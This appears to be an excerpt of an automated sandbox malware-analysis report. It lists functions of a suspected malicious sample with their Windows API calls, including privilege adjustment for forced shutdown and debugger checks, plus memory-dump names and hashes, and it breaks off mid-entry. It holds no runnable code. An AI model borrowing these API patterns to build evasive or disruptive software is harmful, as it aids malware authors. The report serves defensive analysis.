                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: Ios_base_dtorstd::ios_base::_
                                              • String ID:
                                              • API String ID: 323602529-0
                                              • Opcode ID: 62444e8e7acde9b737b11447f5215326673f86d67043c0abe7c58e6aae8a736b
                                              • Instruction ID: a587c1ea758197ce2b95bf960ebc360cf43a37953aa9c19bb5a1ec0a623fe31e
                                              • Opcode Fuzzy Hash: 62444e8e7acde9b737b11447f5215326673f86d67043c0abe7c58e6aae8a736b
                                              • Instruction Fuzzy Hash: 3B516871105B00DBD725DF24C894BE2BBF4BB05714F448A2CE9AA4BB91DB31B54ACB80
                                              Function 6C20262F Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(6C229DD0,0000000C), ref: 6C202642
                                              • ExitThread.KERNEL32 ref: 6C202649
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ErrorExitLastThread
                                              • String ID:
                                              • API String ID: 1611280651-0
                                              • Opcode ID: 8e20b128cfb61448f9e2dfcdb16bcd45372d6f91e169438080200e19acbaa225
                                              • Instruction ID: 93c204e329219219241cd2769f0a368ad3d16b34d622f4b921698a7e950d36ee
                                              • Opcode Fuzzy Hash: 8e20b128cfb61448f9e2dfcdb16bcd45372d6f91e169438080200e19acbaa225
                                              • Instruction Fuzzy Hash: 30F0A9B1B00209AFDB04AFB0C84DAAE3B74FF45715F24054AF801A7B91CF74A949CBA1
                                              Function 6C20E662 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: __wsopen_s
                                              • String ID:
                                              • API String ID: 3347428461-0
                                              • Opcode ID: 85c949191093f15451206047b180ffff3c823a17fa5bb05e340dcfc6160ce84c
                                              • Instruction ID: 5faec81a084a9524e430c476a3356d3a8e4fce1d1c47dfafcb04dd9f516e2c31
                                              • Opcode Fuzzy Hash: 85c949191093f15451206047b180ffff3c823a17fa5bb05e340dcfc6160ce84c
                                              • Instruction Fuzzy Hash: BD116671A0420EAFCB05CF58E944A9B3BF8EF48308F1040AAFC18AB311D630E911CBA4
                                              Function 6C2176EE Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: _free
                                              • String ID:
                                              • API String ID: 269201875-0
                                              • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                              • Instruction ID: f0d68df7c3b5b6d0ab86430dd6a3cc57fd2faa3adc893c043f8b9ac8c88ea99b
                                              • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                              • Instruction Fuzzy Hash: 70012C72C0515EAFCF019FA8CC00AEE7FF5AB48214F144166BE24A2650E7318A25DB91
                                              Function 6C217B47 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,00000000,?,6C217805,?,?,00000000,?,6C217805,00000000,0000000C), ref: 6C217B64
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 6f148a325a47c42660629c569bab1a42eb204d8b6cc808f927812e9006e0e356
                                              • Instruction ID: 871693de62f6fa941db13ec03afae8d12d9ec667c2eccef3acc8b9af6c38af31
                                              • Opcode Fuzzy Hash: 6f148a325a47c42660629c569bab1a42eb204d8b6cc808f927812e9006e0e356
                                              • Instruction Fuzzy Hash: A3D06C3210014DBBDF028E84DC06EDA3BAAFB48B15F014000BE1856060C736E861EB90
                                              Function 6C0C83A0 Relevance: 1.5, APIs: 1, Instructions: 1COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                              • Instruction ID: 23d296cedaa51b2efec75ab7818d5eb30da961f4dbc0db9e56b59ed71170133d
                                              • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                              • Instruction Fuzzy Hash:

                                              Non-executed Functions

                                              Function 6C1F4860 Relevance: 11.0, APIs: 3, Strings: 1, Instructions: 4048COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: _strlen
                                              • String ID: C
                                              • API String ID: 4218353326-4157497815
                                              • Opcode ID: 6847bbd1003eb2ba78f0b18b07249e7b75e8ccec99418deb440c6f914314c02f
                                              • Instruction ID: 0d7b42880c6afe6a2bcb12669eaff136dc92f231cc505c8dc266e9cae92df579
                                              • Opcode Fuzzy Hash: 6847bbd1003eb2ba78f0b18b07249e7b75e8ccec99418deb440c6f914314c02f
                                              • Instruction Fuzzy Hash: 4D73F671644B018FC728CF29C8D0A95B7F2BF9531871A8B6DC0A787A55EB78B54BCB40
                                              Function 6C1F9450 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 31nativeshutdownCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 6C1F945A
                                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C1F9466
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C1F9474
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C1F949B
                                              • NtInitiatePowerAction.NTDLL ref: 6C1F94AF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                                              • String ID: SeShutdownPrivilege
                                              • API String ID: 3256374457-3733053543
                                              • Opcode ID: d3e4677465f4b12ffe83129c0a66109f8b7da63a1aba5a3cd45e3e0a806d10d4
                                              • Instruction ID: eac771609923e2ff32cc0951f3b00ec5919d3cc05b93dfd76630977b37293628
                                              • Opcode Fuzzy Hash: d3e4677465f4b12ffe83129c0a66109f8b7da63a1aba5a3cd45e3e0a806d10d4
                                              • Instruction Fuzzy Hash: 15F05470684308BBEB00AF28DD0EB5A7BB8EF55B11F004518FD95AA1D1D7B06994CB92
                                              Function 6C071950 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 594COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \j`7$\j`7$j
                                              • API String ID: 0-3644614255
                                              • Opcode ID: 0834c5273509027094576ee321ae77b924bae9eb8aa13904c13f6963af8d1707
                                              • Instruction ID: afcb1bb98bf0f806d3a2557b8435494d6e77d7fefb7a462659622958e0137889
                                              • Opcode Fuzzy Hash: 0834c5273509027094576ee321ae77b924bae9eb8aa13904c13f6963af8d1707
                                              • Instruction Fuzzy Hash: 6D4223756093828FCB28CF68C49065EBBE1ABC9354F144A1EE4D9C77A1D334D84ACB67
                                              Function 6C259CE0 Relevance: 5.4, APIs: 1, Strings: 1, Instructions: 1923COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 6C259CE5
                                                • Part of subcall function 6C22FC2A: __EH_prolog.LIBCMT ref: 6C22FC2F
                                                • Part of subcall function 6C2316A6: __EH_prolog.LIBCMT ref: 6C2316AB
                                                • Part of subcall function 6C259A0E: __EH_prolog.LIBCMT ref: 6C259A13
                                                • Part of subcall function 6C259837: __EH_prolog.LIBCMT ref: 6C25983C
                                                • Part of subcall function 6C25D143: __EH_prolog.LIBCMT ref: 6C25D148
                                                • Part of subcall function 6C25D143: ctype.LIBCPMT ref: 6C25D16C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog$ctype
                                              • String ID:
                                              • API String ID: 1039218491-3916222277
                                              • Opcode ID: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                                              • Instruction ID: 8cd30a736f1fbc9afd918773338239005237bbfc9b9596ac315bba1bd010f175
                                              • Opcode Fuzzy Hash: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                                              • Instruction Fuzzy Hash: 7803DE3080124DDFDF11DFA8C980BEEBBB0AF15308F548099E80967A91DB749B99DF61
                                              Function 6C203871 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6C203969
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6C203973
                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6C203980
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                              • String ID:
                                              • API String ID: 3906539128-0
                                              • Opcode ID: 2c31fc84d78282f2ef06b485b9a2717653f9357066612219ccb9e5be73a8335b
                                              • Instruction ID: 6ee0a952159ab212a6f9277e5f00be5fc14702c2fdb3ea5f9ca04e287bd69684
                                              • Opcode Fuzzy Hash: 2c31fc84d78282f2ef06b485b9a2717653f9357066612219ccb9e5be73a8335b
                                              • Instruction Fuzzy Hash: BD31A27490121D9BCB21DF29D888BC9BBF4BF08714F5055EAE81CA7290E7749B858F44
                                              Function 6C20286D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(?,?,6C202925,?,?,?,?), ref: 6C20288F
                                              • TerminateProcess.KERNEL32(00000000,?,6C202925,?,?,?,?), ref: 6C202896
                                              • ExitProcess.KERNEL32 ref: 6C2028A8
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: Process$CurrentExitTerminate
                                              • String ID:
                                              • API String ID: 1703294689-0
                                              • Opcode ID: f735733f7e29217f6ca13cee6541c3dad69fb299e228ca45f07011184e6c4251
                                              • Instruction ID: 07b8d03b61a40e62751eb8460d3639eeacdb7633f15c03939416d873bb571aed
                                              • Opcode Fuzzy Hash: f735733f7e29217f6ca13cee6541c3dad69fb299e228ca45f07011184e6c4251
                                              • Instruction Fuzzy Hash: 89E04635205208ABCF016F20C80CA983B78FB49B56B140426FC0886660CB3AE882CA90
                                              Function 6C22BEA1 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 246COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: x=J
                                              • API String ID: 3519838083-1497497802
                                              • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                              • Instruction ID: b5bd5c7d73cada446e83dcd681a3c8d9de6ea9c263079b302f9098ee55763f19
                                              • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                              • Instruction Fuzzy Hash: 6F910531D0011E9BEF14EFA8C8909EDF775BF05709F208169EC5267A51DF399A49CB90
                                              Function 6C1FA133 Relevance: 3.3, APIs: 2, Instructions: 302COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6C1FAFA0
                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6C1FB7C3
                                                • Part of subcall function 6C1FCA69: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C1FB7AC,00000000,?,?,?,6C1FB7AC,?,6C22853C), ref: 6C1FCAC9
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                                              • String ID:
                                              • API String ID: 915016180-0
                                              • Opcode ID: 925d0163790238de732466850461b0bccee59402ba3c18f29d90b59fe64ca374
                                              • Instruction ID: 8e675fa6a5bf3180d1c42e23813a56f87cb70744112d5727c0305a7fd3cb0584
                                              • Opcode Fuzzy Hash: 925d0163790238de732466850461b0bccee59402ba3c18f29d90b59fe64ca374
                                              • Instruction Fuzzy Hash: 4BB1DDB1A442099FDB14DF65D8C569EBBF1FB49328F20812AD835E7780D3789645CFA0
                                              Function 6C22B972 Relevance: 2.6, Strings: 2, Instructions: 91COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @4J$DsL
                                              • API String ID: 0-2004129199
                                              • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                              • Instruction ID: 8b3451ba6c2e7a406f3f3e5253663bc5ef37afcd5b003aa00c74a131f31eb796
                                              • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                              • Instruction Fuzzy Hash: 71218F377A4C564BD74CCA28DC33EB92680E748305B89527EEE4BCB7D1DE6D8800CA48
                                              Function 6C24840A Relevance: 2.3, APIs: 1, Instructions: 760COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 6C24840F
                                                • Part of subcall function 6C249137: __EH_prolog.LIBCMT ref: 6C24913C
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                                              • Instruction ID: f12e076bbf495e1fe7c99793c530b5159dd6f01101b6bd56f0781ec836d29a54
                                              • Opcode Fuzzy Hash: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                                              • Instruction Fuzzy Hash: D5626A7191125ECFDF19CFA8C890BEDBBB5BF04309F14816AE805AB680D7B49A44CF91
                                              Function 6C2A0AD0 Relevance: 1.9, Strings: 1, Instructions: 669COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: YA1
                                              • API String ID: 0-613462611
                                              • Opcode ID: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                                              • Instruction ID: acb59359667122cdce0693759d78f5fda63dbf177d905dda7aed9082527518c1
                                              • Opcode Fuzzy Hash: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                                              • Instruction Fuzzy Hash: 1542D0706093858FD315CF68C49069ABBE2FFD9308F144A6DE8D68B742D671D94BCB82
                                              Function 6C233BCA Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: __aullrem
                                              • String ID:
                                              • API String ID: 3758378126-0
                                              • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                              • Instruction ID: b74e361f55ec07437eb2ca93acb3f00d7222a15b20dd389ee759cd99d6c83e15
                                              • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                              • Instruction Fuzzy Hash: DB51E8B1A083599BD711CF5AC4C02EDFBE6EF79214F18C05EEC8897242D27A599BC760
                                              Function 6C2ACE80 Relevance: 1.7, Strings: 1, Instructions: 424COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID: 0-3916222277
                                              • Opcode ID: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                                              • Instruction ID: 444f74f1ba2ebc1d2bcd3a2698fcecd6a22f3fb72d361b051c292d9a33b9a73c
